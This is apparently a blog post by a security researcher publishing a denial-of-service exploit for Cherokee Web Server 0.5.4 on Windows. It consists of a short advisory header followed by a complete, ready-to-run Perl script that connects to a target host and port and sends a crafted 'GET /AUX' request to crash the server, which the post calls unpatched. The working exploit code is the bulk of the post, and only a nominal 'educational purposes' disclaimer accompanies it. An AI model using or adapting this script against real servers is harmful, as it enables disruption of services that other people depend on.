Cherokee Web Server 0.5.4 Denial Of Service

#######################################################
#
# Name : Cherokee Web Server 0.5.4 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website:  Xc0re.net
# DATE: 25/10/09
# Tested on Windows !
#######################################################

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

[*] Download Page : http://www.cherokee-project.com/download/windows/

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server , the server crashes !

[*] Exploitation :

#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = “AUX”;

$stuff = “GET /”.$packet.” HTTP/1.1\r\n” .
“User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n” .
“Host:127.0.0.1\r\n”.
“Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n”.
“Accept-Language: en-US,en;q=0.9\r\n”.
“Accept-Charset: iso-8859-1,*,utf-8\r\n”.
“Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n”;

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

exit;
}

$sock = IO::Socket::INET->new( Proto => “tcp”,PeerAddr => $host , PeerPort => $PORT) || die “Cant connect to $host!”;
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

print “\n”;

print “[*] Initializing\n”;

sleep(2);

print “[*] Sendin DOS Packet \n”;

send ($sock , $stuff , 0);
print “[*] Crashed :) \n”;
$res = recv($sock,$response,1024,0);
print $response;

exit;

About these ads

About xc0re

I am a Security Researcher having more then 11 years of experience in Security. I hold CICP (Core Impact Certified Professional) , C|EH (Certified Ethical Hacker). View all posts by xc0re

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 850 other followers

%d bloggers like this: